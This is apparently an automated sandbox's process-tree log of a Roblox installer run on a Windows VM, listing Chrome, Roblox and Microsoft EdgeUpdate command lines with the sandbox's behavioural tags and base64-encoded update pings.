C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3160 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:1092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5860 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:3012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=812 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4736 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:2612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5596 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:1748
-
-
C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
PID:1852 -
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exeMicrosoftEdgeWebview2Setup.exe /silent /install3⤵
- Executes dropped EXE
PID:1360 -
C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU351B.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"4⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Suspicious behavior: EnumeratesProcesses
PID:4872 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc5⤵
- Executes dropped EXE
- Modifies registry class
PID:200
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4056 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3604
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1168
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:4332
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InswNzcwMzIyOS01ODY5LTQ3NzUtQjJCMS1DMzNDMTgwQjU5RjJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTcxLjM5IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTAwNTQxNjQwIiBpbnN0YWxsX3RpbWVfbXM9IjgxNSIvPjwvYXBwPjwvcmVxdWVzdD45⤵
- Executes dropped EXE
- Checks system information in the registry
PID:1400
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{25D76038-9631-41B7-9864-2A11D77D3FBF}" /silent5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2832
-
-
-
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe" -app -isInstallerLaunch3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of UnmapMainImage
PID:596
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:82⤵PID:1124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5764 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4872 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=5188 --field-trial-handle=1768,i,12883348050814675147,290537105229369841,131072 /prefetch:12⤵PID:3804
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:1052
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:2780 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszOUQwQ0M1OS00OTVBLTQ1MDctOEIwMS0zMTZEMzIyQTU4QjB9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIzIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTA1NTIxNTM4Ii8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1740
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵
- Executes dropped EXE
PID:872 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\MicrosoftEdge_X64_126.0.2592.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2272 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{2F3EA1EF-293F-4D06-A261-24DBCB2800DB}\EDGEMITMP_8BFBE.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=126.0.2592.68 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ff78bb9aa40,0x7ff78bb9aa4c,0x7ff78bb9aa584⤵
- Executes dropped EXE
PID:4720
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjVENzYwMzgtOTYzMS00MUI3LTk4NjQtMkExMUQ3N0QzRkJGfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InsxRjJDNUI0RS1BNzM1LTQxQzgtOEQwMy03NkZCNDE0OThGMDl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-…-…-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzI5NTY1Mzc5MiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzcwMDg3ODQyNiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjgzOSIgZG93bmxvYWRfdGltZV9tcz0iNzQxNjQiIGRvd25sb2FkZWQ9IjE3Mjk1NzI0MCIgdG90YWw9IjE3Mjk1NzI0MCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iNDA1MTkiLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1316
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:580
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of UnmapMainImage
PID:592
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of UnmapMainImage
PID:4844
-
C:\Windows\system32\SystemPropertiesRemote.exe"C:\Windows\system32\SystemPropertiesRemote.exe"1⤵PID:1732
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵PID:2052
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4756
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Modifies data under HKEY_USERS
PID:2464 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B03F6FE8-253D-4C99-BADE-CFBCA90582C0}\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"2⤵
- Executes dropped EXE
PID:1512 -
C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EUAE89.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{681D8A3C-184C-4883-8C7D-55AA3487F1EC}"3⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
PID:3776 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
PID:4424
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:520 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:1308
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:3120
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.41\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
PID:872
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuNDEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QTQ0OURFMTAtNTAyNC00MEQxLUI2MEYtN0E3RjUxMzQ1REQ1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlFFTVUiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTcxLjM5IiBuZXh0dmVyc2lvbj0iMS4zLjE4Ny40MSIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRlPSI2Mzg0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MTk0NDUwNDciPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwMTA1Mzg4Mzg3Ii8-PC9hcHA-PC9yZXF1ZXN0Pg4⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3524
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjgxRDhBM0MtMTg0Qy00ODgzLThDN0QtNTVBQTM0ODdGMUVDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntFMTQxMzIwQi1CMDNGLTRGRjEtQUE5MS00OUFENzMzQjIxMzF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iUUVNVSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3I0NTJ0MStrMlRncS9IWHpqdkZOQlJob3BCV1I5c2JqWHhxZVVESDl1WDA9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNzEuMzkiIG5leHR2ZXJzaW9uPSIxLjMuMTg3LjQxIiBsYW5nPSIiIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-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-PHVwZGF0ZWNoZWNrLz48cGluZyByPSItMSIgcmQ9Ii0xIiBwaW5nX2ZyZXNobmVzcz0iezMwQjIyMjgwLTMzRjQtNEY0Ny1CM0E1LTZGMTI0NjdBMTRENX0iLz48L2FwcD48L3JlcXVlc3Q-2⤵
- Executes dropped EXE
- Checks system information in the registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1732
-
-
C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of UnmapMainImage
PID:4508
-
C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe"C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe"1⤵
- Executes dropped EXE
- Enumerates system info in registry
PID:2732 -
C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exeC:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe -relaunch2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
PID:3876 -
